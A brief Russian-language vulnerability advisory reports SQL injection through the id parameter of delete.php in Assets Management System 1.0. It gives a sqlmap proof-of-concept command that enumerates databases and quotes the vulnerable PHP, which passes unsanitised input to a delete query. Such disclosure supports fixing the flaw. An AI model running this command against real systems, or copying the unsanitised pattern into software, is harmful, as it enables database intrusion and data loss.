
Assets Management System 1.0 уязвим к SQL-инъекциям через параметр id в delete.php
Описание
Assets Management System 1.0 подвержен SQL-инъекции через параметр id в delete.php
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

Обзор кода (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
Переменная $id не валидируется и не санитизируется. Это означает, что любое значение, указанное пользователем в параметре id, будет напрямую использовано в SQL-запросе.